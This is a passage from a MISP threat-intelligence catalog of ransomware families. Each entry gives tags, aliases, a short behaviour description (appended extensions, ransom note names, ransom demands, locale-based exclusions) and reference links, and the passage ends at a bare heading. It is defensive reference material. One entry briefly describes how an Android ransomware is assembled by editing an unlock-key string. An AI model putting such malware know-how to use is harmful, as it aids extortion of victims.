A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can. Discovered on February 6, 2018. May have been distributed through unknown vectors. Will not encrypt a machine if its IP address is identified as coming from Iran; this feature enables actors to avoid a particular Iranian cybercrime law that prohibits Iran-based actors from attacking Iranian victims. Encrypts files on the infected machine, scrambles files, and appends the .BlackRuby extension to them. Installs a Monero miner on the infected computer that utilizes the machine’s maximum CPU power. Delivers a ransom note in English asking for US$650 in Bitcoins. Might be installed via Remote Desktop Services.

The tag is: misp-galaxy:ransomware="Black Ruby"

Black Ruby is also known as:

  • BlackRuby

Table 8454. Table References

Links

https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

WhiteRose

A new ransomware has been discovered by MalwareHunterTeam that is based off of the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer it will encrypt the files, scramble the filenames, and append the .WHITEROSE extension to them.

The tag is: misp-galaxy:ransomware="WhiteRose"

Table 8455. Table References

Links

https://www.bleepingcomputer.com/news/security/the-whiterose-ransomware-is-decryptable-and-tells-a-strange-story/

http://id-ransomware.blogspot.com/2018/03/whiterose-ransomware.html

PUBG Ransomware

In what could only be a joke, a new ransomware has been discovered called "PUBG Ransomware" that will decrypt your files if you play the game called PlayerUnknown’s Battlegrounds. Discovered by MalwareHunterTeam, when the PUBG Ransomware is launched it will encrypt a user’s files and folders on the user’s desktop and append the .PUBG extension to them. When it has finished encrypting the files, it will display a screen giving you two methods that you can use to decrypt the encrypted files.

The tag is: misp-galaxy:ransomware="PUBG Ransomware"

Table 8456. Table References

Links

https://www.bleepingcomputer.com/news/security/pubg-ransomware-decrypts-your-files-if-you-play-playerunknowns-battlegrounds/

https://id-ransomware.blogspot.com/2018/04/pubg-ransomware.html

LockCrypt

LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don’t take much time preparing the attack or the payload. Instead, they’re rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.

The tag is: misp-galaxy:ransomware="LockCrypt"

Table 8457. Table References

Links

https://www.bleepingcomputer.com/news/security/lockcrypt-ransomware-cracked-due-to-bad-crypto/

https://twitter.com/malwrhunterteam/status/1034436350748053504

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

http://id-ransomware.blogspot.com/2017/06/lockcrypt-ransomware.html

Magniber Ransomware

Magniber is a new ransomware being distributed by the Magnitude Exploit Kit that appears to be the successor to the Cerber Ransomware. While many aspects of the Magniber Ransomware are different than Cerber, the payment system and the files it encrypts are very similar.

The tag is: misp-galaxy:ransomware="Magniber Ransomware"

Table 8458. Table References

Links

https://www.bleepingcomputer.com/news/security/decrypters-for-some-versions-of-magniber-ransomware-released/

https://www.bleepingcomputer.com/news/security/goodbye-cerber-hello-magniber-ransomware/

https://twitter.com/demonslay335/status/1005133410501787648

http://id-ransomware.blogspot.com/2017/10/my-decryptor-ransomware.html

Vurten

The tag is: misp-galaxy:ransomware="Vurten"

Table 8459. Table References

Links

https://twitter.com/siri_urz/status/981191281195044867

http://id-ransomware.blogspot.com/2018/04/vurten-ransomware.html

Reveton ransomware

A ransomware family that targets users from certain countries or regions. It locks the computer and displays a location-specific webpage that covers the desktop and demands that the user pay a fine for the supposed possession of illicit material. The Reveton ransomware is one of the first screen-locking ransomware strains, and it appeared when Bitcoin was still in its infancy, and before it became the cryptocurrency of choice in all ransomware operations. Instead, Reveton operators asked victims to buy GreenDot MoneyPak vouchers, take the code on the voucher and enter it in the Reveton screen locker.

The tag is: misp-galaxy:ransomware="Reveton ransomware"

Table 8460. Table References

Links

https://www.bleepingcomputer.com/news/security/microsoft-engineer-charged-in-reveton-ransomware-case/

https://en.wikipedia.org/wiki/Ransomware#Reveton

https://nakedsecurity.sophos.com/2012/08/29/reveton-ransomware-exposed-explained-and-eliminated/

Fusob

Fusob is one of the major mobile ransomware families. Between April 2015 and March 2016, about 56 percent of accounted mobile ransomware was Fusob. Like a typical mobile ransomware, it employs scare tactics to extort people to pay a ransom. The program pretends to be an accusatory authority, demanding the victim to pay a fine from $100 to $200 USD or otherwise face a fictitious charge. Rather surprisingly, Fusob suggests using iTunes gift cards for payment. Also, a timer clicking down on the screen adds to the users’ anxiety as well. In order to infect devices, Fusob masquerades as a pornographic video player. Thus, victims, thinking it is harmless, unwittingly download Fusob. When Fusob is installed, it first checks the language used in the device. If it uses Russian or certain Eastern European languages, Fusob does nothing. Otherwise, it proceeds on to lock the device and demand ransom. Among victims, about 40% of them are in Germany with the United Kingdom and the United States following with 14.5% and 11.4% respectively. Fusob has lots in common with Small, which is another major family of mobile ransomware. They represented over 93% of mobile ransomwares between 2015 and 2016.

The tag is: misp-galaxy:ransomware="Fusob"

Table 8461. Table References

Links

https://en.wikipedia.org/wiki/Ransomware#Fusob

OXAR

The tag is: misp-galaxy:ransomware="OXAR"

Table 8462. Table References

Links

https://twitter.com/demonslay335/status/981270787905720320

BansomQare Manna Ransomware

The tag is: misp-galaxy:ransomware="BansomQare Manna Ransomware"

Table 8463. Table References

Links

http://id-ransomware.blogspot.com/2018/03/bansomqarewanna-ransomware.html

Haxerboi Ransomware

The tag is: misp-galaxy:ransomware="Haxerboi Ransomware"

MC Ransomware

Supposed joke ransomware, decrypt when running an exectable with the string "Minecraft"

The tag is: misp-galaxy:ransomware="MC Ransomware"

Table 8465. Table References

Links

https://www.bleepingcomputer.com/news/security/minecraft-and-cs-go-ransomware-strive-for-media-attention/

CSGO Ransomware

Supposed joke ransomware, decrypt when running an exectable with the string "csgo"

The tag is: misp-galaxy:ransomware="CSGO Ransomware"

Table 8466. Table References

Links

https://www.bleepingcomputer.com/news/security/minecraft-and-cs-go-ransomware-strive-for-media-attention/

NMCRYPT Ransomware

The NMCRYPT Ransomware is a generic file encryption Trojan that was detected in the middle of April 2018. The NMCRYPT Ransomware is a file encoder Trojan that is designed to make data unreadable and convince users to pay a fee for unlocking content on the infected computers. The NMCRYPT Ransomware is nearly identical to hundreds of variants of the HiddenTear open-source ransomware and compromised users are unable to use the Shadow Volume snapshots made by Windows to recover. Unfortunately, the NMCRYPT Ransomware disables the native recovery features on Windows, and you need third-party applications to rebuild your data.

The tag is: misp-galaxy:ransomware="NMCRYPT Ransomware"

Table 8468. Table References

Links

https://sensorstechforum.com/nmcrypt-files-ransomware-virus-remove-restore-data/

https://www.enigmasoftware.com/nmcryptansomware-removal/

Iron

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example. We know the Iron ransomware has mimicked at least three ransomware families:Maktub (payment portal design) DMA Locker (Iron Unlocker, decryption tool) Satan (exclusion list)

The tag is: misp-galaxy:ransomware="Iron"

Table 8469. Table References

Links

https://bartblaze.blogspot.lu/2018/04/maktub-ransomware-possibly-rebranded-as.html

http://id-ransomware.blogspot.com/2018/04/ironlocker-ransomware.html

Tron ransomware

The tag is: misp-galaxy:ransomware="Tron ransomware"

Table 8470. Table References

Links

https://twitter.com/malwrhunterteam/status/985152346773696512

http://id-ransomware.blogspot.com/2018/04/tron-ransomware.html

Unnamed ramsomware 1

A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality, the executables compiles an embedded encrypted C# program at runtime and launches it directly into memory.

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 1"

Table 8471. Table References

Links

https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/

HPE iLO 4 Ransomware

Attackers are targeting Internet accessible HPE iLO 4 remote management interfaces, supposedly encrypting the hard drives, and then demanding Bitcoins to get access to the data again. According to the victim, the attackers are demanding 2 bitcoins to gain access to the drives again. The attackers will also provide a bitcoin address to the victim that should be used for payment. These bitcoin addresses appear to be unique per victim as the victim’s was different from other reported ones. An interesting part of the ransom note is that the attackers state that the ransom price is not negotiable unless the victim’s are from Russia. This is common for Russian based attackers, who in many cases tries to avoid infecting Russian victims. Finally, could this be a decoy/wiper rather than an actual true ransomware attack? Ransomware attacks typically provide a unique ID to the victim in order to distinguish one victim from another. This prevents a victim from "stealing" another victim’s payment and using it to unlock their computer. In a situation like this, where no unique ID is given to identify the encrypted computer and the email is publicly accessible, it could be a case where the main goal is to wipe a server or act as a decoy for another attack.

The tag is: misp-galaxy:ransomware="HPE iLO 4 Ransomware"

Table 8472. Table References

Links

https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/

https://twitter.com/M_Shahpasandi/status/989157283799162880

https://id-ransomware.blogspot.com/2018/04/hpe-ilo-ransomware.html

Sigrun Ransomware

When Sigrun is executed it will first check "HKEY_CURRENT_USER\Keyboard Layout\Preload" to see if it is set to the Russian layout. If the computer is using a Russian layout, it will not encrypt the computer and just delete itself. Otherwise Sigrun will scan a computer for files to encrypt and skip any that match certain extensions, filenames, or are located in particular folders.

The tag is: misp-galaxy:ransomware="Sigrun Ransomware"

Table 8473. Table References

Links

https://www.bleepingcomputer.com/news/security/sigrun-ransomware-author-decrypting-russian-victims-for-free/

http://id-ransomware.blogspot.com/2018/05/sigrun-ransomware.html

CryBrazil

Mostly Hidden Tear with some codes from Eda2 & seems compiled w/ Italian VS. Maybe related to OpsVenezuela?

The tag is: misp-galaxy:ransomware="CryBrazil"

Table 8474. Table References

Links

https://twitter.com/malwrhunterteam/status/1002953824590614528

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://id-ransomware.blogspot.com/2018/06/crybrazil-ransomware.html

Pedcont

new destrucrtive ransomware called Pedcont that claims to encrypt files because the victim has accessed illegal content on the deep web. The screen then goes blank and becomes unresponsive.

The tag is: misp-galaxy:ransomware="Pedcont"

Table 8475. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/ [https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/ ]

http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html

DiskDoctor

new Scarab Ransomware variant called DiskDoctor that appends the .DiskDoctor extension and drops a ransom note named HOW TO RECOVER ENCRYPTED FILES.TXT

The tag is: misp-galaxy:ransomware="DiskDoctor"

DiskDoctor is also known as:

  • Scarab-DiskDoctor

Table 8476. Table References

Links

https://id-ransomware.blogspot.com/2018/06/scarab-diskdoctor-ransomware.html

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

RedEye

Jakub Kroustek discovered the RedEye Ransomware, which appends the .RedEye extension and wipes the contents of the files. RedEye can also rewrite the MBR with a screen that gives authors contact info and YouTube channel. Bart also wrote an article on this ransomware detailing how it works and what it does on a system.The ransomware author contacted BleepingComputer and told us that this ransomware was never intended for distribution and was created just for fun.

The tag is: misp-galaxy:ransomware="RedEye"

Table 8477. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://twitter.com/JakubKroustek/status/1004463935905509376

https://bartblaze.blogspot.com/2018/06/redeye-ransomware-theres-more-than.html

https://id-ransomware.blogspot.com/2018/06/redeye-ransomware.html

Aurora Ransomware

Typical ransom software, Aurora virus plays the role of blackmailing PC operators. It encrypts files and the encryption cipher it uses is pretty strong. After encryption, the virus attaches .aurora at the end of the file names that makes it impossible to open the data. Thereafter, it dispatches the ransom note totaling 6 copies, without any change to the main objective i.e., victims must write an electronic mail addressed to anonimus.mr@yahoo.com while stay connected until the criminals reply telling the ransom amount.

The tag is: misp-galaxy:ransomware="Aurora Ransomware"

Aurora Ransomware is also known as:

  • Zorro Ransomware

Table 8478. Table References

Links

https://www.spamfighter.com/News-21588-Aurora-Ransomware-Circulating-the-Cyber-Space.htm

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-8th-2018-crybrazil-cryptconsole-and-magniber/

https://twitter.com/demonslay335/status/1004435398687379456

https://www.bleepingcomputer.com/news/security/aurora-zorro-ransomware-actively-being-distributed/

https://id-ransomware.blogspot.com/2018/05/aurora-ransomware.html

PGPSnippet Ransomware

The tag is: misp-galaxy:ransomware="PGPSnippet Ransomware"

Table 8479. Table References

Links

https://twitter.com/demonslay335/status/1005138187621191681

Donut

S!Ri found a new ransomware called Donut that appends the .donut extension and uses the email donutmmm@tutanota.com.

The tag is: misp-galaxy:ransomware="Donut"

Table 8481. Table References

Links

https://twitter.com/siri_urz/status/1005438610806583296

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-15th-2018-dbger-scarab-and-more/

http://id-ransomware.blogspot.com/2018/06/donut-ransomware.html

Paradise Ransomware

MalwareHunterTeam discovered a new Paradise Ransomware variant that uses the extension _V.0.0.0.1{paradise@all-ransomware.info}.prt and drops a ransom note named PARADISE_README_paradise@all-ransomware.info.txt.

The tag is: misp-galaxy:ransomware="Paradise Ransomware"

Table 8483. Table References

Links

https://twitter.com/malwrhunterteam/status/1005420103415017472

https://twitter.com/malwrhunterteam/status/993499349199056897

http://id-ransomware.blogspot.com/2017/09/paradise-ransomware.html

B2DR Ransomware

uses the .reycarnasi1983@protonmail.com.gw3w amd a ransom note named ScrewYou.txt

The tag is: misp-galaxy:ransomware="B2DR Ransomware"

Table 8484. Table References

Links

https://twitter.com/demonslay335/status/1006220895302705154

https://id-ransomware.blogspot.com/2018/03/b2dr-ransomware.html

YYTO Ransomware

uses the extension .codyprince92@mail.com.ovgm and drops a ransom note named Readme.txt

The tag is: misp-galaxy:ransomware="YYTO Ransomware"

Table 8485. Table References

Links

https://twitter.com/demonslay335/status/1006237353474756610

http://id-ransomware.blogspot.com/2017/05/yyto-ransomware.html

Unnamed ramsomware 2

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 2"

Table 8486. Table References

Links

https://twitter.com/demonslay335/status/1007334654918250496

DirCrypt

The tag is: misp-galaxy:ransomware="DirCrypt"

DirCrypt has relationships with:

  • similar: misp-galaxy:malpedia="DirCrypt" with estimative-language:likelihood-probability="likely"

Table 8488. Table References

Links

https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/

DBGer Ransomware

The authors of the Satan ransomware have rebranded their "product" and they now go by the name of DBGer ransomware, according to security researcher MalwareHunter, who spotted this new version earlier today. The change was not only in name but also in the ransomware’s modus operandi. According to the researcher, whose discovery was later confirmed by an Intezer code similarity analysis, the new (Satan) DBGer ransomware now also incorporates Mimikatz, an open-source password-dumping utility. The purpose of DBGer incorporating Mimikatz is for lateral movement inside compromised networks. This fits a recently observed trend in Satan’s modus operandi.

The tag is: misp-galaxy:ransomware="DBGer Ransomware"

Table 8489. Table References

Links

https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/

http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html

RASTAKHIZ

Hidden Tear variant discovered in October 2016. After activation, provides victims with an unlimited amount of time to gather the requested ransom money and pay it. Related unlock keys and the response sent to and from a Gmail addres

The tag is: misp-galaxy:ransomware="RASTAKHIZ"

Table 8490. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

https://id-ransomware.blogspot.com/2017/11/rastakhiz-ransomware.html

TYRANT

DUMB variant discovered on November 16, 2017. Disguised itself as a popular virtual private network (VPN) in Iran known as Psiphon and infected Iranian users. Included Farsi-language ransom note, decryptable in the same way as previous DUMB-based variants. Message requested only US$15 for unlock key. Advertised two local and Iran-based payment processors: exchange.ir and webmoney.ir.Shared unique and specialized indicators with RASTAKHIZ; iDefense threat intelligence analysts believe this similarity confirms that the same actor was behind the repurposing of both types of ransomware.

The tag is: misp-galaxy:ransomware="TYRANT"

TYRANT is also known as:

  • Crypto Tyrant

Table 8491. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

http://id-ransomware.blogspot.com/2017/10/tyrant-ransomware.html

WannaSmile

zCrypt variant discovered on November 17, 2017, one day after the discovery of TYRANT. Used Farsi-language ransom note asking for a staggering 20 Bitcoin ransom payment. Also advertised local Iran-based payment processors and exchanges—www.exchangeing[.]ir, www.payment24[.]ir, www.farhadexchange.net, and www.digiarz.com)—through which Bitcoins could be acquired.

The tag is: misp-galaxy:ransomware="WannaSmile"

Table 8492. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

https://id-ransomware.blogspot.com/2017/11/wannasmile-ransomware.html

Unnamed Android Ransomware

Uses APK Editor Pro. Picks and activates DEX>Smali from APK Editor. Utilizes LockService application and edits the “const-string v4, value” to a desired unlock key. Changes contact information within the ransom note. Once the victim has downloaded the malicious app, the only way to recover its content is to pay the ransom and receive the unlock key.

The tag is: misp-galaxy:ransomware="Unnamed Android Ransomware"

Table 8493. Table References

Links

https://www.accenture.com/t20180803T064557Zw/us-en/_acnmedia/PDF-83/Accenture-Cyber-Threatscape-Report-2018.pdf

KEYPASS

A new distribution campaign is underway for a STOP Ransomware variant called KeyPass based on the amount of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.

The tag is: misp-galaxy:ransomware="KEYPASS"

KEYPASS is also known as:

  • KeyPass

Table 8494. Table References

Links

https://www.bleepingcomputer.com/news/security/new-keypass-ransomware-campaign-underway/

https://www.kaspersky.com/blog/keypass-ransomware/23447/

STOP Ransomware

Emmanuel_ADC-Soft found a new STOP Ransomware variant that appends the .INFOWAIT extension and drops a ransom note named !readme.txt.

The tag is: misp-galaxy:ransomware="STOP Ransomware"

Table 8495. Table References

Links

https://twitter.com/Emm_ADC_Soft/status/1064459080016760833

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

https://twitter.com/MarceloRivero/status/1065694365056679936

http://id-ransomware.blogspot.com/2017/12/stop-ransomware.html

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware

A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a "tip" to decrypt the files.

The tag is: misp-galaxy:ransomware="Barack Obama’s Everlasting Blue Blackmail Virus Ransomware"

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware is also known as:

  • Barack Obama’s Blackmail Virus Ransomware

Table 8496. Table References

Links

https://twitter.com/malwrhunterteam/status/1032242391665790981

https://www.bleepingcomputer.com/news/security/barack-obamas-blackmail-virus-ransomware-only-encrypts-exe-files/

https://id-ransomware.blogspot.com/2018/08/barack-obamas-ransomware.html

CryptoNar

When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted. If the targeted file has a .txt or .md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file’s name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file’s name.

The tag is: misp-galaxy:ransomware="CryptoNar"

CryptoNar has relationships with:

  • similar: misp-galaxy:ransomware="CryptoJoker" with estimative-language:likelihood-probability="likely"

Table 8497. Table References

Links

https://www.bleepingcomputer.com/news/security/cryptonar-ransomware-discovered-and-quickly-decrypted/

https://twitter.com/malwrhunterteam/status/1034492151541977088

https://id-ransomware.blogspot.com/2018/08/cryptonar-ransomware.html

CreamPie Ransomware

Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the .[backdata@cock.li].CreamPie extension to them.

The tag is: misp-galaxy:ransomware="CreamPie Ransomware"

Table 8498. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

https://twitter.com/JakubKroustek/status/1033656080839139333

https://id-ransomware.blogspot.com/2018/08/creampie-ransomware.html

Jeff the Ransomware

Looks to be in-development as it does not encrypt.

The tag is: misp-galaxy:ransomware="Jeff the Ransomware"

Table 8499. Table References

Links

https://twitter.com/leotpsc/status/1033625496003731458

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

Cassetto Ransomware

Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.

The tag is: misp-galaxy:ransomware="Cassetto Ransomware"

Table 8500. Table References

Links

https://twitter.com/demonslay335/status/1034213399922524160

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

https://id-ransomware.blogspot.com/2018/08/cassetto-ransomware.html

Acroware Cryptolocker Ransomware

Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.

The tag is: misp-galaxy:ransomware="Acroware Cryptolocker Ransomware"

Acroware Cryptolocker Ransomware is also known as:

  • Acroware Screenlocker

Table 8501. Table References

Links

https://twitter.com/leotpsc/status/1034346447112679430

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

Termite Ransomware

Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaaa extension to encrypted files.

The tag is: misp-galaxy:ransomware="Termite Ransomware"

Table 8502. Table References

Links

https://twitter.com/B_H101/status/1034379267956715520

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

PICO Ransomware

S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.

The tag is: misp-galaxy:ransomware="PICO Ransomware"

PICO Ransomware is also known as:

  • Pico Ransomware

Table 8503. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/

https://twitter.com/siri_urz/status/1035138577934557184

Sigma Ransomware

Today one of our volunteers, Aura, told me about a new new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipients computer.

The tag is: misp-galaxy:ransomware="Sigma Ransomware"

Table 8504. Table References

Links

https://www.bleepingcomputer.com/news/security/sigma-ransomware-being-distributed-using-fake-craigslist-malspam/

Crypt0saur

The tag is: misp-galaxy:ransomware="Crypt0saur"

Mongo Lock

An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.

The tag is: misp-galaxy:ransomware="Mongo Lock"

Table 8505. Table References

Links

https://www.bleepingcomputer.com/news/security/mongo-lock-attack-ransoming-deleted-mongodb-databases/

Kraken Cryptor Ransomware

The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it.

The tag is: misp-galaxy:ransomware="Kraken Cryptor Ransomware"

Table 8506. Table References

Links

https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-now-installing-the-kraken-cryptor-ransomware/

https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/

https://twitter.com/MarceloRivero/status/1059575186117328898

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

SAVEfiles

The tag is: misp-galaxy:ransomware="SAVEfiles"

Table 8507. Table References

Links

https://www.bleepingcomputer.com/news/security/fallout-exploit-kit-pushing-the-savefiles-ransomware/

File-Locker

The File-Locker Ransomware is a Hidden Tear variant that is targeting victims in Korea. When victim’s are infected it will leave a ransom requesting 50,000 Won, or approximately 50 USD, to get the files back. This ransomware uses AES encryption with a static password of "dnwls07193147", so it is easily decryptable.

The tag is: misp-galaxy:ransomware="File-Locker"

Table 8508. Table References

Links

https://www.bleepingcomputer.com/news/security/file-locker-ransomware-targets-korean-victims-and-asks-for-50k-won/

CommonRansom

A new ransomware called CommonRansom was discovered that has a very bizarre request. In order to decrypt a computer after a payment is made, they require the victim to open up Remote Desktop Services on the affected computer and send them admin credentials in order to decrypt the victim’s files.

The tag is: misp-galaxy:ransomware="CommonRansom"

Table 8509. Table References

Links

https://www.bleepingcomputer.com/news/security/commonransom-ransomware-demands-rdp-access-to-decrypt-files/

God Crypt Joke Ransomware

MalwareHunterTeam found a new ransomware called God Crypt that does not appear to decrypt and appears to be a joke ransomware. Has an unlock code of 29b579fb811f05c3c334a2bd2646a27a.

The tag is: misp-galaxy:ransomware="God Crypt Joke Ransomware"

God Crypt Joke Ransomware is also known as:

  • Godsomware v1.0

  • Ransomware God Crypt

Table 8510. Table References

Links

https://twitter.com/malwrhunterteam/status/1048616343975682048

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

DecryptFox Ransomware

Michael Gillespie found a new ransomware uploaded to ID Ransomware that appends the .encr extension and drops a ransom note named readmy.txt.

The tag is: misp-galaxy:ransomware="DecryptFox Ransomware"

Table 8511. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://twitter.com/demonslay335/status/1049325784979132417

garrantydecrypt

Michael Gillespie found a new ransomware that appends the .garrantydecrypt extension and drops a ransom note named RECOVERY_FILES.txt

The tag is: misp-galaxy:ransomware="garrantydecrypt"

Table 8512. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-12th-2018-notpetya-gandcrab-and-more/

https://www.bleepingcomputer.com/news/security/ransomware-pretends-to-be-proton-security-team-securing-data-from-hackers/

MVP Ransomware

Siri discovered a new ransomware that is appending the .mvp extension to encrypted files.

The tag is: misp-galaxy:ransomware="MVP Ransomware"

Table 8513. Table References

Links

https://twitter.com/siri_urz/status/1039077365039673344

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

StorageCrypter

Michael Gillespie noticed numerous submissions to ID Ransomware from South Korea for the StorageCrypter ransomware. This version is using a new ransom note named read_me_for_recover_your_files.txt.

The tag is: misp-galaxy:ransomware="StorageCrypter"

StorageCrypter is also known as:

  • SambaCry

Table 8514. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

Rektware

GrujaRS discovered a new ransomware called Rektware that appends the .CQScSFy extension

The tag is: misp-galaxy:ransomware="Rektware"

Table 8515. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-14th-2018-kraken-dharma-and-matrix/

https://twitter.com/GrujaRS/status/1040677247735279616

M@r1a ransomware

The tag is: misp-galaxy:ransomware="M@r1a ransomware"

M@r1a ransomware is also known as:

  • M@r1a

  • BlackHeart

Table 8516. Table References

Links

https://twitter.com/malwrhunterteam/status/1058775145005887489

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

"prepending (enc) ransomware" (Not an official name)

The tag is: misp-galaxy:ransomware=""prepending (enc) ransomware" (Not an official name)"

"prepending (enc) ransomware" (Not an official name) is also known as:

  • Aperfectday2018

Table 8517. Table References

Links

https://twitter.com/demonslay335/status/1059470985055875074

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-9th-2018-mostly-dharma-variants/

PyCL Ransomware

The tag is: misp-galaxy:ransomware="PyCL Ransomware"

PyCL Ransomware is also known as:

  • Dxh26wam

Table 8518. Table References

Links

https://twitter.com/demonslay335/status/1060921043957755904

Vapor Ransomware

MalwareHunterTeam discovered the Vapor Ransomware that appends the .Vapor extension to encrypted files. Will delete files if you do not pay in time.

The tag is: misp-galaxy:ransomware="Vapor Ransomware"

Table 8519. Table References

Links

https://twitter.com/malwrhunterteam/status/1063769884608348160

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

EnyBenyHorsuke Ransomware

GrujaRS discovered a new ransomware called EnyBenyHorsuke Ransomware that appends the .Horsuke extension to encrypted files.

The tag is: misp-galaxy:ransomware="EnyBenyHorsuke Ransomware"

Table 8520. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-23rd-2018-stop-dharma-and-more/

https://twitter.com/GrujaRS/status/1063930127610986496

EnyBeny Nuclear Ransomware

@GrujaRS discovered a new in-dev ransomware called EnyBeny Nuclear Ransomware that meant to append the extension .PERSONAL_ID:.Nuclear to encrypted files, but failed due to a bug.

The tag is: misp-galaxy:ransomware="EnyBeny Nuclear Ransomware"

Table 8522. Table References

Links

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/

https://twitter.com/GrujaRS/status/1066799421080461312

https://www.youtube.com/watch?v=_aaFon7FVbc

Lucky Ransomware

Michael Gillespie discovered a new ransomware that renamed encrypted files to "[original].[random].lucky" and drops a ransom note named How_To_Decrypt_My_File.txt.

The tag is: misp-galaxy:ransomware="Lucky Ransomware"

Table 8523. Table References

Links

https://twitter.com/demonslay335/status/1067109661076262913

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-30th-2018-indictments-sanctions-and-more/

WeChat Ransom

